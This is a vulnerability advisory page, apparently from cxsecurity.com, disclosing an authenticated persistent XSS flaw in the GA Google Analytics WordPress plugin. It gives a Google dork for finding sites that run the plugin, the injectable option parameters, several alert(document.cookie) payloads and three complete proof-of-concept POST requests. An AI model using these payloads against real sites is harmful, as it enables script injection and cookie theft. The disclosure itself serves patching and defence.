GA Google Analytics WordPress Plugin <= 20210211 - Multiple Authenticated Persistent XSS

2021.05.17
ru m0ze (RU) ru
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: inurl:/wp-content/plugins/ga-google-analytics/

/*! - # VULNERABILITY: GA Google Analytics WordPress Plugin <= 20210211 - Authenticated Persistent XSS - # GOOGLE DORK: inurl:/wp-content/plugins/ga-google-analytics/ - # DATE: 2021-04-04 - # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ] - # VENDOR: Jeff Starr [ https://plugin-planet.com ] - # SOFTWARE VERSION: <= 20210211 - # SOFTWARE LINK: https://wordpress.org/plugins/ga-google-analytics/ - # CVSS: AV:N/AC:L/PR:H/UI:N/S:C - # CWE: CWE-79 - # CVE: N/A */ ### -- [ Info: ] [i] An Authenticated Persistent XSS vulnerability was discovered in the GA Google Analytics plugin through v20210211 for WordPress. [i] Vulnerable parameter(s): &gap_options[gap_id]=, &gap_options[tracker_object]=, &gap_options[gap_custom_code]=. ### -- [ Impact: ] [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource. ### -- [ Payloads: ] [$] GA Tracking ID: 13"' ' m0ze=m0ze= onload=alert(document.cookie); // [$] Custom Tracker Objects: '');alert(document.cookie);alert('m0ze' [$] Custom Tracker Objects (Part #1): '\');alert(document.cookie);/* | Custom GA Code (Part #2): */; ### -- [ PoC #1 | Authenticated Persistent XSS | GA Tracking ID: ] [!] POST /wp-admin/options.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 459 Cookie: [admin cookies] option_page=gap_plugin_options&action=update&_wpnonce=a85709d61b&gap_options%5Bgap_id%5D=13%22%27+%27+m0ze%3Dm0ze%3D+onload%3Dalert%28document.cookie%29%3B+%2F%2F&gap_options%5Bgap_enable%5D=2&gap_options%5Bgap_location%5D=header&gap_options%5Btracker_object%5D=&gap_options%5Bgap_custom_code%5D=&gap_options%5Bgap_custom%5D= ### -- [ PoC #2 | Authenticated Persistent XSS | Custom Tracker Objects: ] [!] POST /wp-admin/options.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 449 Cookie: [admin cookie] option_page=gap_plugin_options&action=update&_wpnonce=a85709d61b&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dga-google-analytics%26settings-updated%3Dtrue&gap_options%5Bgap_id%5D=m0ze&gap_options%5Bgap_enable%5D=1&gap_options%5Bgap_location%5D=header&gap_options%5Btracker_object%5D=%27%27%29%3Balert%28document.cookie%29%3Balert%28%27m0ze%27&gap_options%5Bgap_custom_code%5D=&gap_options%5Bgap_custom%5D= ### -- [ PoC #3 | Authenticated Persistent XSS | Custom Tracker Objects & Custom GA Code: ] [!] POST /wp-admin/options.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 445 Cookie: [admin cookie] option_page=gap_plugin_options&action=update&_wpnonce=a85709d61b&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dga-google-analytics%26settings-updated%3Dtrue&gap_options%5Bgap_id%5D=m0ze&gap_options%5Bgap_enable%5D=1&gap_options%5Bgap_location%5D=header&gap_options%5Btracker_object%5D=%27%5C%27%29%3Balert%28document.cookie%29%3B%2F*&gap_options%5Bgap_custom_code%5D=*%2F%3B&gap_options%5Bgap_custom%5D= ### -- [ Contacts: ] [+] Website: m0ze.ru [+] GitHub: @m0ze [+] Telegram: @m0ze_ru [+] Twitter: @vladm0ze

References:

https://m0ze.ru/vulnerability/%5B2021-04-04%5D-%5BWordPress%5D-%5BCWE-79%5D-GA-Google-Analytics-WordPress-Plugin-v20210211.txt
https://twitter.com/vladm0ze


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top